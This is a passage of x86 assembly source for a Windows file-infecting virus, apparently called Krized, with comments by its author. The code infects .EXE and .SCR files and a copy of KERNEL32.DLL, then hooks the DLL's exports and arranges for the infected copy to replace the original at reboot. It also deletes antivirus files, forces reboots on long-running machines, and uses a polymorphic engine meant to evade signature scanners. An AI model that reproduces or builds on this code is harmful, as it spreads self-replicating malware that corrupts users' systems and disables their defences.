CALL Infect_File
|
|
|
|
; Try to cover-up as many tracks as possible by clearing
|
|
; most of our code in memory, as we don't need it anymore.
|
|
|
|
Wipe_Memory: MOV EDI, EBP
|
|
MOV CX, (Wipe_Memory-START)
|
|
CLD
|
|
REP STOSB
|
|
|
|
ADD EDI, (Infect_File-Wipe_Memory)
|
|
MOV CX, (Virus_End-Infect_File)
|
|
REP STOSB
|
|
|
|
MOV ECX, 0 ; Should we perform a reboot?
|
|
ExitWindowsEx = DWORD PTR $-4
|
|
JECXZ Rest_Init_SEH
|
|
|
|
PUSH EWX_FORCE OR EWX_REBOOT ; Force a system reboot.
|
|
PUSH 0
|
|
CALL ECX
|
|
|
|
Rest_Init_SEH: XOR EAX, EAX
|
|
|
|
POP DWORD PTR FS:[EAX] ; Unhook our own SEH.
|
|
POP EAX
|
|
|
|
Return_To_Host: POPAD ; Restore all registers.
|
|
POPFD
|
|
|
|
RET ; Return to our host.
|
|
|
|
|
|
|
|
;-------------------------------------------------
|
|
; ESI == 0FFFFFFFFh = Infect kernel.
|
|
; ESI != 0FFFFFFFFh = Infect file pointed by ESI.
|
|
;-------------------------------------------------
|
|
Infect_File:
|
|
PUSHAD
|
|
|
|
XOR EBX, EBX
|
|
|
|
CALL Setup_Inf_SEH
|
|
|
|
PUSHAD
|
|
|
|
MOV ESI, [ESP+(9*4)] ; Grab exception-code off
|
|
LODSD ; the stack.
|
|
|
|
CALL Get_Delta
|
|
|
|
SHL EAX, 4 ; Strip flags.
|
|
|
|
CMP EAX, (03h SHL 4) ; Virus' request to call an
|
|
JE Virus_Request ; API ?
|
|
|
|
MOV ESP, [ESP+(10*4)] ; Unhandled exception, so
|
|
; abort further execution.
|
|
JMP_R_Inf_SEH: JMP Rest_Inf_SEH
|
|
|
|
Virus_Request: MOV EDX, [ESP+(11*4)] ; Context-block.
|
|
|
|
LEA EAX, [EBP+(Perform_API-START)]
|
|
|
|
XCHG [EDX+184], EAX ; Swap EIP.
|
|
|
|
MOV ECX, [EDX+196] ; ESP.
|
|
|
|
; Win9x sets the exception-address with Exception_EIP + 1, whereas NT
|
|
; does the right thing and uses Exception_EIP, we need some extra
|
|
; code to keep this in account.
|
|
|
|
CMP BYTE PTR [EAX], 0CCh ; This is the breakpoint?
|
|
JNE Swap_Address
|
|
|
|
INC EAX ; Skip breakpoint.
|
|
|
|
Swap_Address: XCHG [ECX], EAX ; Swap index-number with
|
|
; Perform_API's address.
|
|
|
|
MOV [EBP+(Work_API_Index-START)], AL
|
|
|
|
POPAD
|
|
|
|
XOR EAX, EAX ; Reload context and continue
|
|
; execution.
|
|
RET
|
|
|
|
Setup_Inf_SEH: PUSH DWORD PTR FS:[EBX]
|
|
MOV FS:[EBX], ESP
|
|
|
|
; The virtual-size entry of object-headers is not reliable,
|
|
; therefore we need to allocate our memory by hand.
|
|
|
|
PUSH (End_Heap-Virus_End) ; Allocate memory on the
|
|
PUSH EBX ; global heap.
|
|
PUSH ixGlobalAlloc
|
|
INT 03h
|
|
|
|
XCHG ECX, EAX ; Error?
|
|
JECXZ JMP_R_Inf_SEH
|
|
|
|
MOV [EBP+(Global_Handle-START)], ECX
|
|
|
|
MOV [EBP+(Infect_Mode-START)], BL
|
|
|
|
INC ESI ; Request to infect K32 ?
|
|
JZ Payload_Test
|
|
|
|
DEC ESI ; Some API can have NULL.
|
|
JZ JMP_Free_Glo_M
|
|
|
|
MOV BYTE PTR [EBP+(Infect_Mode-START)], (Open_Candidate-Infect_Mode) - 1
|
|
|
|
XCHG EBX, EAX ; Zero EAX.
|
|
|
|
LEA EBX, [ECX+(ANSI_Target_File-Virus_End)]
|
|
|
|
MOV EDI, EBX
|
|
|
|
MOV ECX, 260
|
|
|
|
CLD
|
|
|
|
Convert_Path: LODSB ; Fetch next byte/word.
|
|
NOP
|
|
Unicode_Switch = WORD PTR $-2
|
|
|
|
OR AH, AH ; Is it non-ASCII ?
|
|
JNZ JMP_Free_Glo_M ; Then abort infect.
|
|
|
|
CMP AL, 'a'
|
|
JB Store_Upcase
|
|
|
|
CMP AL, 'z'
|
|
JA Store_Upcase
|
|
|
|
SUB AL, 'a' - 'A' ; Convert to uppercase.
|
|
Store_Upcase: STOSB
|
|
|
|
OR AL, AL
|
|
JZ Init_Find_Name
|
|
|
|
LOOP Convert_Path
|
|
|
|
JMP_Free_Glo_M: JMP Free_Global_M
|
|
|
|
Init_Find_Name: MOV ESI, EDI
|
|
|
|
Find_File_Name: DEC ESI
|
|
|
|
CMP ESI, EBX ; Reached the beginning?
|
|
JE Check_File_Ext
|
|
|
|
CMP BYTE PTR [ESI-1], '\' ; Found start filename?
|
|
JNE Find_File_Name
|
|
|
|
Check_File_Ext: CMP [EDI-5], 'EXE.' ; Standard .EXE-file?
|
|
JE Calc_CRC_Name
|
|
|
|
CMP [EDI-5], 'RCS.' ; Perhaps a screen-saver?
|
|
JNE JMP_Free_Glo_M
|
|
|
|
Calc_CRC_Name: CALL Calculate_CRC16 ; Calculate filename's CRC.
|
|
|
|
; Kill AV-files.
|
|
|
|
LEA EDI, [EBP+(Kill_Table-START)]
|
|
PUSH Kill_CRC_Count
|
|
POP ECX
|
|
REPNE SCASW
|
|
JNE Payload_Test
|
|
|
|
PUSH FILE_ATTRIBUTE_NORMAL ; Prevent any Happy99 alike
|
|
PUSH EBX ; 'protection'.
|
|
PUSH ixSetFileAttributesA
|
|
INT 03h
|
|
|
|
PUSH EBX ; Later dude..
|
|
PUSH ixDeleteFileA
|
|
INT 03h
|
|
|
|
Payload_Test: CALL Check_For_Payload ; Activate?
|
|
|
|
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Free_Global_M-Clear_Tracks_Sw) - 1
|
|
|
|
JMP $
|
|
Infect_Mode = BYTE PTR $-1
|
|
|
|
MOV EBX, [EBP+(Global_Handle-START)]
|
|
|
|
; Obtain the path to the Windoze system-directory,
|
|
; which is most likely C:\WINDOWS\SYSTEM.
|
|
|
|
PUSH 260
|
|
LEA ESI, [EBX+(Clean_K32_Path-Virus_End)]
|
|
PUSH ESI
|
|
PUSH ixGetSystemDirectoryA
|
|
INT 03h
|
|
|
|
LEA EDI, [EBX+(Infected_K32_Path-Virus_End)]
|
|
|
|
MOV [EBP+(Offset_Inf_K32-START)], EDI
|
|
|
|
PUSH EDI
|
|
|
|
XCHG ECX, EAX
|
|
CLD
|
|
REP MOVSB
|
|
|
|
PUSH ESI
|
|
|
|
; Append the temporary virus filename to the
|
|
; system-path, ie. C:\WINDOWS\SYSTEM\KRIZED.TT6.
|
|
|
|
LEA ESI, [EBP+(Infected_K32-START)]
|
|
|
|
MOVSD
|
|
MOVSD
|
|
MOVSD
|
|
|
|
; Append the original kernel filename to the
|
|
; system-path, ie. C:\WINDOWS\SYSTEM\KERNEL32.DLL.
|
|
|
|
POP EDI
|
|
|
|
LEA ESI, [EBP+(KERNEL32_Name-START)]
|
|
MOV CL, 14
|
|
REP MOVSB
|
|
|
|
; In the system-dir, copy KERNEL32.DLL to KRIZED.TT6.
|
|
|
|
PUSH 1
|
|
LEA EAX, [EBX+(Infected_K32_Path-Virus_End)]
|
|
PUSH EAX
|
|
LEA EAX, [EBX+(Clean_K32_Path-Virus_End)]
|
|
PUSH EAX
|
|
PUSH ixCopyFileA
|
|
INT 03h
|
|
|
|
POP EBX
|
|
|
|
DEC EAX ; Any problems doing it?
|
|
JNZ Free_Global_M
|
|
|
|
MOV [EBP+(Clear_Tracks_Sw-START)], AL
|
|
|
|
Open_Candidate: XOR ESI, ESI
|
|
JNZ $-27
|
|
|
|
PUSH EBX ; Umm.. get it's attribs?
|
|
PUSH ixGetFileAttributesA
|
|
INT 03h
|
|
|
|
INC EAX ; Ack, error.
|
|
JZ Clear_Tracks
|
|
|
|
DEC EAX ; Restore return value.
|
|
|
|
PUSH EAX
|
|
PUSH EBX
|
|
|
|
AND AL, NOT 00000001b ; Readonly my ass..
|
|
|
|
PUSH EAX ; Strip readonly-flag.
|
|
PUSH EBX
|
|
PUSH ixSetFileAttributesA
|
|
INT 03h
|
|
|
|
OR EAX, EAX ; Test for error.
|
|
JZ Restore_Attr
|
|
|
|
PUSH ESI ; Open the candidate-file.
|
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|
PUSH OPEN_EXISTING
|
|
PUSH ESI
|
|
PUSH ESI
|
|
PUSH GENERIC_READ OR GENERIC_WRITE
|
|
PUSH EBX
|
|
PUSH ixCreateFileA
|
|
INT 03h
|
|
|
|
MOV [EBP+(File_Handle-START)], EAX
|
|
|
|
INC EAX ; Error?
|
|
JZ Restore_Attr
|
|
|
|
MOV EAX, [EBP+(Global_Handle-START)]
|
|
ADD EAX, (Time_Last_Write-Virus_End)
|
|
|
|
PUSH EAX
|
|
|
|
PUSH EAX ; Fetch it's time-stamps.
|
|
SUB EAX, 8
|
|
PUSH EAX
|
|
SUB EAX, 8
|
|
PUSH EAX
|
|
PUSH DWORD PTR [EBP+(File_Handle-START)]
|
|
PUSH ixGetFileTime
|
|
INT 03h
|
|
|
|
PUSH ESI ; Map whole file.
|
|
PUSH ESI
|
|
PUSH ESI
|
|
PUSH PAGE_READONLY
|
|
PUSH ESI ; Standard security.
|
|
PUSH DWORD PTR [EBP+(File_Handle-START)]
|
|
PUSH ixCreateFileMappingA
|
|
INT 03h
|
|
|
|
OR EAX, EAX ; Error?
|
|
JZ Restore_Stamp
|
|
|
|
MOV [EBP+(Map_Handle-START)], EAX
|
|
|
|
PUSH ESI
|
|
PUSH ESI
|
|
PUSH ESI
|
|
PUSH FILE_MAP_READ
|
|
PUSH DWORD PTR [EBP+(Map_Handle-START)]
|
|
PUSH ixMapViewOfFile
|
|
INT 03h
|
|
|
|
OR EAX, EAX ; Error?
|
|
JZ Close_Mapping
|
|
|
|
MOV [EBP+(Map_Address-START)], EAX
|
|
|
|
XCHG EBX, EAX
|
|
|
|
PUSH ESI
|
|
PUSH DWORD PTR [EBP+(File_Handle-START)]
|
|
PUSH ixGetFileSize
|
|
INT 03h
|
|
|
|
CMP EAX, 4096 ; Avoid too small files.
|
|
JB Abort_Checks
|
|
|
|
CMP [EBX.MZ_Mark], 'ZM' ; It must be an .EXE-file.
|
|
JNE Abort_Checks
|
|
|
|
CMP [EBX.MZ_Reloc_Table], 40h ; External header present?
|
|
JB Abort_Checks
|
|
|
|
ADD EBX, [EBX+3Ch] ; Obtain pointer PE-header.
|
|
|
|
CMP [EBX.PE_Mark], 'EP' ; PE-header is really there?
|
|
JNE Abort_Checks
|
|
|
|
; Only infect 80386/80486/80586-files.
|
|
|
|
CMP [EBX.CPU_Type], 14Ch ; 80386 compatibility?
|
|
JB Abort_Checks
|
|
|
|
CMP [EBX.CPU_Type], 14Eh ; 80586 compatibility?
|
|
JA Abort_Checks
|
|
|
|
CMP BYTE PTR [EBP+(Infect_Mode-START)], 0
|
|
JZ Check_Our_Mark
|
|
|
|
; Don't infect non-K32 DLL's.
|
|
|
|
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
|
|
JNZ Abort_Checks
|
|
|
|
Check_Our_Mark: XCHG EDI, EAX
|
|
|
|
MOVZX EAX, [EBX.Object_Count]
|
|
DEC EAX
|
|
PUSH 40
|
|
POP ECX
|
|
MUL ECX
|
|
|
|
MOVZX EDX, [EBX.NT_Header_Size]
|
|
|
|
LEA EDX, [EBX+24+EDX]
|
|
|
|
ADD EDX, EAX
|
|
|
|
MOV AL, BYTE PTR [EDX.Section_Flags+3]
|
|
|
|
AND AL, 11010000b ; Strip all but our own
|
|
; flags.
|
|
|
|
CMP AL, 11010000b ; Already infected? (R/W/S).
|
|
JE Abort_Checks
|
|
|
|
; Calculate physical size after infection.
|
|
|
|
MOV EAX, [EDX.Section_Physical_Offset]
|
|
ADD EAX, [EDX.Section_Physical_Size]
|
|
ADD EAX, Virus_Size + Poly_Size
|
|
MOV ECX, [EBX.File_Align]
|
|
CALL Align_EAX
|
|
|
|
CMP EAX, EDI ; Host increases in size?
|
|
JAE Set_Inf_Size
|
|
|
|
XCHG EDI, EAX ; Don't resize if not.
|
|
|
|
Set_Inf_Size: MOV [EBP+(Infected_Size-START)], EAX
|
|
|
|
INC ESI ; Mark as a valid candidate.
|
|
JNS Abort_Checks
|
|
|
|
DB 0EAh ; Just a lame anti-?
|
|
|
|
Abort_Checks: PUSH DWORD PTR [EBP+(Map_Address-START)]
|
|
PUSH ixUnmapViewOfFile
|
|
INT 03h
|
|
|
|
PUSH DWORD PTR [EBP+(Map_Handle-START)]
|
|
PUSH ixCloseHandle
|
|
INT 03h
|
|
|
|
DEC ESI ; Valid host?
|
|
JNZ Restore_Stamp
|
|
|
|
PUSH ESI
|
|
PUSH DWORD PTR [EBP+(Infected_Size-START)]
|
|
PUSH ESI
|
|
PUSH PAGE_READWRITE
|
|
PUSH ESI ; Standard security.
|
|
PUSH DWORD PTR [EBP+(File_Handle-START)]
|
|
PUSH ixCreateFileMappingA
|
|
INT 03h
|
|
|
|
OR EAX, EAX
|
|
JZ Restore_Stamp
|
|
|
|
MOV [EBP+(Map_Handle-START)], EAX
|
|
|
|
PUSH ESI
|
|
PUSH ESI
|
|
PUSH ESI
|
|
PUSH FILE_MAP_WRITE
|
|
PUSH DWORD PTR [EBP+(Map_Handle-START)]
|
|
PUSH ixMapViewOfFile
|
|
INT 03h
|
|
|
|
MOV [EBP+(Map_Address-START)], EAX
|
|
|
|
OR EAX, EAX ; Error?
|
|
JZ Close_Mapping
|
|
|
|
XCHG EDI, EAX ; Base of mapped candidate.
|
|
|
|
MOV EBX, [EDI+3Ch] ; PE-header of our candidate.
|
|
ADD EBX, EDI
|
|
|
|
MOVZX EAX, [EBX.Object_Count] ; Calculate offset of last
|
|
DEC EAX ; object-header.
|
|
PUSH 40
|
|
POP ECX
|
|
MUL ECX
|
|
|
|
; Size of formatted header.
|
|
|
|
MOVZX EDX, [EBX.NT_Header_Size]
|
|
|
|
LEA EDI, [EBX+24+EDX]
|
|
|
|
PUSH EDI ; Start object-headers.
|
|
|
|
ADD EDI, EAX ; Last object-header.
|
|
|
|
MOV EAX, [EDI.Section_Physical_Size]
|
|
|
|
PUSH EAX
|
|
|
|
ADD EAX, Virus_Size + Poly_Size
|
|
MOV ECX, [EBX.File_Align]
|
|
CALL Align_EAX
|
|
|
|
MOV ESI, EAX
|
|
|
|
XCHG [EDI.Section_Physical_Size], EAX
|
|
|
|
ADD EAX, [EDI.Section_RVA]
|
|
|
|
PUSH EAX
|
|
|
|
MOV EAX, [EDI.Section_Virtual_Size]
|
|
ADD EAX, (Virus_Size + Poly_Size) - 1
|
|
MOV ECX, [EBX.Object_Align]
|
|
|
|
Calc_Virt_Size: INC EAX
|
|
CALL Align_EAX
|
|
|
|
CMP EAX, ESI
|
|
JB Calc_Virt_Size
|
|
|
|
MOV [EDI.Section_Virtual_Size], EAX
|
|
|
|
ADD EAX, [EDI.Section_RVA]
|
|
|
|
MOV [EBX.Image_Size], EAX
|
|
|
|
POP EAX
|
|
|
|
POP ECX
|
|
|
|
ADD ECX, [EDI.Section_Physical_Offset]
|
|
|
|
ADD ECX, [EBP+(Map_Address-START)]
|
|
|
|
MOV EDX, EAX
|
|
|
|
XCHG [EBX.EIP_RVA], EAX
|
|
|
|
CALL Poly_Engine ; Lame poly-layer.
|
|
|
|
POP EDX
|
|
|
|
; Krized used to add a new section to the host, but unfortunately most NT
|
|
; files (including K32) don't have room for an extra object-header, this
|
|
; more or less forced me to use the append-to-the-last-section-method,
|
|
; which could technically cause instabilities.
|
|
|
|
; Readable/writeable/shareable.
|
|
|
|
OR BYTE PTR [EDI.Section_Flags+3], 11010000b
|
|
|
|
XOR ECX, ECX
|
|
|
|
; We're infecting KERNEL32.DLL ?
|
|
|
|
CMP [EBP+(Infect_Mode-START)], CL
|
|
JNZ Init_Succesful
|
|
|
|
; Screw K32's build-time to force the loader
|
|
; to patch executable's bound imports with our
|
|
; hooked API-addresses in K32's export-table,
|
|
; instead of using hardcoded addresses.
|
|
|
|
INC [EBX.PE_Date_Time]
|
|
|
|
; Notify DLL of PROCESS_ATTACH, this is always
|
|
; done regardless of these flags, but I rather
|
|
; waste some bytes playing safe.
|
|
|
|
OR BYTE PTR [EBX.DLL_Flags], 00000001b
|
|
|
|
; Now change the exports of K32 to point
|
|
; to the virus' own handlers.
|
|
|
|
LEA ESI, [EBP+(Hook_Exports-START)]
|
|
|
|
CLD
|
|
|
|
Hook_Export: LODSD ; Get array entry in export.
|
|
|
|
XCHG EDI, EAX
|
|
|
|
; Convert the RVA to a physical address.
|
|
|
|
Find_RVA: MOV EAX, [EDX.Section_RVA]
|
|
ADD EAX, [EDX.Section_Virtual_Size]
|
|
|
|
CMP EDI, EAX ; RVA is in section's space?
|
|
JB Calculate_Phys
|
|
|
|
ADD EDX, 40 ; Next section.
|
|
|
|
JMP Find_RVA
|
|
|
|
Calculate_Phys: SUB EDI, [EDX.Section_RVA]
|
|
ADD EDI, [EDX.Section_Physical_Offset]
|
|
|
|
MOVZX EAX, WORD PTR [EBP+(Dispatch_API-START)+(ECX*2)]
|
|
|
|
ADD EAX, 12345678h
|
|
New_Virus_RVA = DWORD PTR $-4
|
|
|
|
ADD EDI, [EBP+(Map_Address-START)]
|
|
STOSD
|
|
|
|
Cont_Hook_Loop: INC ECX
|
|
|
|
CMP CL, Hook_API_Count ; Did 'em all?
|
|
JB Hook_Export
|
|
|
|
MOV ESI, [EBP+(Global_Handle-START)]
|
|
|
|
; Attemp to register a file-update to replace the
|
|
; original KERNEL32.DLL with the infected one at
|
|
; the next boot-up.
|
|
|
|
PUSH MOVEFILE_DELAY_UNTIL_REBOOT OR MOVEFILE_REPLACE_EXISTING
|
|
LEA EAX, [ESI+(Clean_K32_Path-Virus_End)]
|
|
PUSH EAX
|
|
LEA EAX, [ESI+(Infected_K32_Path-Virus_End)]
|
|
PUSH EAX
|
|
PUSH ixMoveFileExA
|
|
INT 03h
|
|
|
|
OR EAX, EAX ; Successful?
|
|
JNZ Init_Succesful
|
|
|
|
PUSH ixGetLastError ; Get extended error-
|
|
INT 03h ; information.
|
|
|
|
; Access denied or function not available?
|
|
|
|
CMP EAX, ERROR_ACCESS_DENIED
|
|
JE Unmap_View
|
|
|
|
; Else do it the Win9x-way...
|
|
|
|
CALL @2
|
|
DB 'WININIT.INI', 0
|
|
@2: LEA EAX, [ESI+(Infected_K32_Path-Virus_End)]
|
|
PUSH EAX
|
|
LEA EAX, [ESI+(Clean_K32_Path-Virus_End)]
|
|
PUSH EAX
|
|
CALL @3
|
|
DB 'rename', 0
|
|
@3: PUSH ixWritePrivateProfileStringA
|
|
INT 03h
|
|
|
|
XCHG ECX, EAX ; Fuck, user doesn't seem
|
|
JECXZ Unmap_View ; to have admin-priviliges.
|
|
|
|
Init_Succesful: XOR EDX, EDX
|
|
|
|
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Free_Global_M-Clear_Tracks_Sw) - 1
|
|
|
|
CMP [EBP+(Infect_Mode-START)], DL
|
|
JNZ Test_Checksum
|
|
|
|
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Reboot_Test-Clear_Tracks_Sw) - 1
|
|
|
|
Test_Checksum: CMP [EBX.PE_Checksum], EDX ; This file is checksummed?
|
|
JZ Unmap_View
|
|
|
|
; Check out CheckSumMappedFile and notice how it uses an
|
|
; entirely different algorithm, as usual, weird stuph..
|
|
|
|
MOV [EBX.PE_Checksum], EDX
|
|
|
|
MOV ESI, [EBP+(Map_Address-START)]
|
|
|
|
MOV ECX, 12345678h
|
|
Infected_Size = DWORD PTR $-4
|
|
|
|
SHR ECX, 1 ; Words.
|
|
|
|
Checksum_Loop: MOVZX EAX, WORD PTR [ESI]
|
|
|
|
ADD EDX, EAX
|
|
MOV EAX, EDX
|
|
|
|
AND EDX, 0FFFFh ; Convert to 16-bit word.
|
|
SHR EAX, 16
|
|
ADD EDX, EAX
|
|
|
|
INC ESI
|
|
INC ESI
|
|
|
|
LOOP Checksum_Loop
|
|
|
|
MOV EAX, EDX
|
|
|
|
SHR EAX, 16
|
|
|
|
ADD AX, DX
|
|
|
|
ADD EAX, [EBP+(Infected_Size-START)]
|
|
|
|
MOV [EBX.PE_Checksum], EAX
|
|
|
|
Unmap_View: PUSH 12345678h
|
|
Map_Address = DWORD PTR $-4
|
|
PUSH ixUnmapViewOfFile
|
|
INT 03h
|
|
|
|
Close_Mapping: PUSH 12345678h
|
|
Map_Handle = DWORD PTR $-4
|
|
PUSH ixCloseHandle
|
|
INT 03h
|
|
|
|
Restore_Stamp: POP EAX ; Restore file's original
|
|
; time-stamps.
|
|
PUSH EAX
|
|
SUB EAX, 8
|
|
PUSH EAX
|
|
SUB EAX, 8
|
|
PUSH EAX
|
|
PUSH DWORD PTR [EBP+(File_Handle-START)]
|
|
PUSH ixSetFileTime
|
|
INT 03h
|
|
|
|
Close_File: PUSH 12345678h ; And finally close the file.
|
|
File_Handle = DWORD PTR $-4
|
|
PUSH ixCloseHandle
|
|
INT 03h
|
|
|
|
; Restore the file's original attributes.
|
|
|
|
Restore_Attr: CMP BYTE PTR [EBP+(Clear_Tracks_Sw-START)], 0
|
|
JNZ Set_Attributes
|
|
|
|
; Trash-copy must be deletable.
|
|
|
|
AND BYTE PTR [ESP+(1*4)], NOT 00000001b
|
|
|
|
Set_Attributes: PUSH ixSetFileAttributesA
|
|
INT 03h
|
|
|
|
; If something went wrong while in the process of infecting
|
|
; an KERNEL32.DLL-copy, clean up our trash by deleting it.
|
|
|
|
Clear_Tracks: JMP $
|
|
Clear_Tracks_Sw = BYTE PTR $-1
|
|
|
|
PUSH 12345678h ; Delete KRIZED.TT6 in the
|
|
Offset_Inf_K32 = DWORD PTR $-4 ; system-directory.
|
|
PUSH ixDeleteFileA
|
|
INT 03h
|
|
|
|
JMP Free_Global_M
|
|
|
|
; Here we initialize the virus to reboot the system if it has been
|
|
; running for over approximately 3 days. Server-systems often run
|
|
; for years constantly, and our virus can't become resident until
|
|
; the next system-boot, hence this routine.
|
|
|
|
Reboot_Test: PUSH ixGetTickCount ; Retrieve tickcount since
|
|
INT 03h ; Windoze was started.
|
|
|
|
OR EAX, EAX ; Less than approximately
|
|
JNS Free_Global_M ; 3 days?
|
|
|
|
CALL @4 ; Load USER32.DLL as we need
|
|
DB 'USER32', 0 ; one of it's functions.
|
|
@4: PUSH ixLoadLibraryA
|
|
INT 03h
|
|
|
|
CALL @5 ; Retrieve API-address.
|
|
DB 'ExitWindowsEx', 0
|
|
@5: PUSH EAX
|
|
PUSH ixGetProcAddress
|
|
INT 03h
|
|
|
|
; Store the address for later use.
|
|
|
|
MOV [EBP+(ExitWindowsEx-START)], EAX
|
|
|
|
Free_Global_M: PUSH 12345678h ; Free our global allocated
|
|
Global_Handle = DWORD PTR $-4 ; memory.
|
|
PUSH ixGlobalFree
|
|
INT 03h
|
|
|
|
Rest_Inf_SEH: XOR EAX, EAX ; Unhook our SEH.
|
|
|
|
POP DWORD PTR FS:[EAX]
|
|
POP EBX
|
|
|
|
POPAD ; Restore reggies..
|
|
|
|
RET ; And we're done.
|
|
|
|
|
|
; Some humble poly-engine, it builds decryptors with random registers
|
|
; peppered with some simple junk. It won't keep-out the average AV,
|
|
; but it's effective enough against public-domain AV-scanners based on
|
|
; pure signature-scanning.
|
|
|
|
; So get me an official opcode list and I'll throw out the lame table-
|
|
; driven polymorphics :P
|
|
|
|
Poly_Engine:
|
|
PUSHAD
|
|
|
|
PUSH EAX
|
|
|
|
Gen_Decryptor: MOV EDI, [ESP+(7*4)] ; ECX on entry.
|
|
|
|
PUSH 13 ; Pick a DWORD stacker.
|
|
POP EAX
|
|
CALL Get_Random
|
|
|
|
MOV AL, [EBP+(PUSH_Reg32-START)+EAX]
|
|
STOSB
|
|
|
|
MOV AL, 9Ch ; PUSHFD
|
|
STOSB
|
|
|
|
MOV AL, 60h ; PUSHAD
|
|
STOSB
|
|
|
|
CALL Add_Garbage
|
|
|
|
MOV AL, 0E8h ; CALL
|
|
STOSB
|
|
|
|
MOV AL, 10
|
|
CALL Get_Random
|
|
|
|
INC EAX
|
|
STOSD
|
|
|
|
MOV ESI, EDI
|
|
|
|
XCHG ECX, EAX
|
|
|
|
Add_Random: MOV EAX, ESP
|
|
CALL Get_Random
|
|
|
|
STOSB
|
|
|
|
LOOP Add_Random
|
|
|
|
PUSH 7
|
|
POP EAX
|
|
CALL Get_Random
|
|
|
|
XCHG EBX, EAX
|
|
|
|
MOV AL, [EBP+(POP_Reg32-START)+EBX]
|
|
STOSB
|
|
|
|
CALL Get_Free_Reg
|
|
|
|
XCHG EDX, EAX
|
|
|
|
CALL Add_Garbage
|
|
|
|
MOV AL, [EBP+(MOV_Reg32-START)+EDX] ; MOV Cntr_Reg
|
|
STOSB
|
|
|
|
MOV AX, Virus_Size
|
|
STOSD
|
|
|
|
CALL Add_Garbage
|
|
|
|
MOV [EBP+(Decrypt_Loop-START)], EDI
|
|
|
|
CALL Add_Garbage
|
|
|
|
MOV AL, 0FFh
|
|
CALL Get_Random
|
|
JP Construct_XOR ; 1/2 chance of including DS:
|
|
|
|
MOV AL, 3Eh ; DS:
|
|
STOSB
|
|
|
|
Construct_XOR: MOV AL, 80h
|
|
STOSB
|
|
|
|
MOV AL, [EBP+(XOR_Ptr_Reg32-START)+EBX]
|
|
STOSB
|
|
|
|
MOV [EBP+(Patch_Delta-START)], EDI
|
|
|
|
MOV AX, Virus_Size-1
|
|
STOSD
|
|
|
|
Get_Random_Key: CALL Get_Random
|
|
|
|
OR AL, AL
|
|
JZ Get_Random_Key
|
|
|
|
STOSB
|
|
|
|
PUSH EAX
|
|
|
|
CALL Add_Garbage
|
|
|
|
MOV AL, [EBP+(DEC_Reg32-START)+EBX]
|
|
STOSB
|
|
|
|
CALL Add_Garbage
|
|
|
|
MOV AL, [EBP+(DEC_Reg32-START)+EDX]
|
|
STOSB
|
|
|
|
MOV AL, 75h ; JNZ
|
|
STOSB
|
|
|
|
MOV EAX, EDI
|
|
|
|
SUB EAX, 12345678h
|
|
Decrypt_Loop = DWORD PTR $-4
|
|
NOT EAX
|
|
STOSB
|
|
|
|
POP EDX
|
|
|
|
MOV EAX, EDI
|
|
SUB EAX, ESI
|
|
|
|
ADD DS:[12345678h], EAX
|
|
Patch_Delta = DWORD PTR $-4
|
|
|
|
MOV EAX, EDI ; Calculate size decryptor.
|
|
SUB EAX, [ESP+(7*4)]
|
|
|
|
CMP EAX, 140 ; Too large? Start over then.
|
|
JNB Gen_Decryptor
|
|
|
|
CMP AL, 120 ; Too small? Ditto.
|
|
JB Gen_Decryptor
|
|
|
|
PUSH EDI
|
|
|
|
MOV ESI, EBP
|
|
MOV CX, Virus_Size
|
|
REP MOVSB
|
|
|
|
ADD EAX, [ESP+(7*4)] ; EDX at entry.
|
|
|
|
MOV [EBP+(New_Virus_RVA-START)], EAX
|
|
|
|
MOV [EDI+(Virus_RVA-START)-Virus_Size], EAX
|
|
|
|
POP EAX
|
|
|
|
SUB EAX, [EBP+(Patch_Delta-START)]
|
|
|
|
SUB EAX, 4
|
|
|
|
NEG EAX
|
|
|
|
MOV [EDI+(Patch_Decrypt-START)-Virus_Size], EAX
|
|
|
|
MOV [EDI+(Busy_Switch-START)-Virus_Size], CL
|
|
|
|
MOV WORD PTR [EDI+(Unicode_Switch-START)-Virus_Size], 90ACh
|
|
|
|
MOV [EDI+(Delay_Timer-START)-Virus_Size], CL
|
|
|
|
MOV BYTE PTR [EDI+(Init_Mode-START)-Virus_Size], (CALL_Setup_SEH-Init_Mode) - 1
|
|
|
|
CMP [EBP+(Infect_Mode-START)], CL
|
|
JNZ POP_New_EIP
|
|
|
|
MOV [EDI+(Init_Mode-START)-Virus_Size], CL
|
|
|
|
POP_New_EIP: POP DWORD PTR [EDI+(Host_EIP-START)-Virus_Size]
|
|
|
|
MOV ECX, Virus_Size
|
|
|
|
Encrypt_Virus: DEC EDI
|
|
|
|
XOR [EDI], DL
|
|
|
|
LOOP Encrypt_Virus
|
|
|
|
POPAD
|
|
|
|
RET
|
|
|
|
|
|
Add_Garbage:
|
|
PUSH 8
|
|
POP EAX
|
|
CALL Get_Random
|
|
|
|
INC EAX
|
|
|
|
XCHG ECX, EAX
|
|
|
|
Add_Junk: PUSH ECX
|
|
|
|
PUSH 5
|
|
POP EAX
|
|
CALL Get_Random
|
|
JZ End_Junk_Loop
|
|
|
|
DEC EAX
|
|
JZ Junk_ADD_Reg32
|
|
|
|
DEC EAX
|
|
JZ Junk_DEC_Reg32
|
|
|
|
Junk_MOV_Reg32: CALL Get_Free_Reg
|
|
|
|
MOV AL, [EBP+(MOV_Reg32-START)+EAX]
|
|
STOSB
|
|
|
|
MOV EAX, ESP
|
|
CALL Get_Random
|
|
|
|
STOSD
|
|
|
|
JMP End_Junk_Loop
|
|
|
|
Junk_DEC_Reg32: CALL Get_Free_Reg
|
|
|
|
MOV AL, [EBP+(DEC_Reg32-START)+EAX]
|
|
STOSB
|
|
|
|
JMP End_Junk_Loop
|
|
|
|
Junk_ADD_Reg32: MOV AL, 81h
|
|
STOSB
|
|
|
|
CALL Get_Free_Reg
|
|
|
|
MOV AL, [EBP+(ADD_Reg32-START)+EAX]
|
|
STOSB
|
|
|
|
MOV EAX, ESP
|
|
CALL Get_Random
|
|
|
|
STOSD
|
|
|
|
End_Junk_Loop: POP ECX
|
|
|
|
LOOP Add_Junk
|
|
|
|
XOR EAX, EAX
|
|
|
|
RET
|
|
|
|
|
|
Get_Free_Reg:
|
|
PUSH 7
|
|
POP EAX
|
|
CALL Get_Random
|
|
|
|
CMP EAX, EBX
|
|
JE Get_Free_Reg
|
|
|
|
CMP EAX, EDX
|
|
JE Get_Free_Reg
|
|
|
|
RET
|
|
|
|
|
|
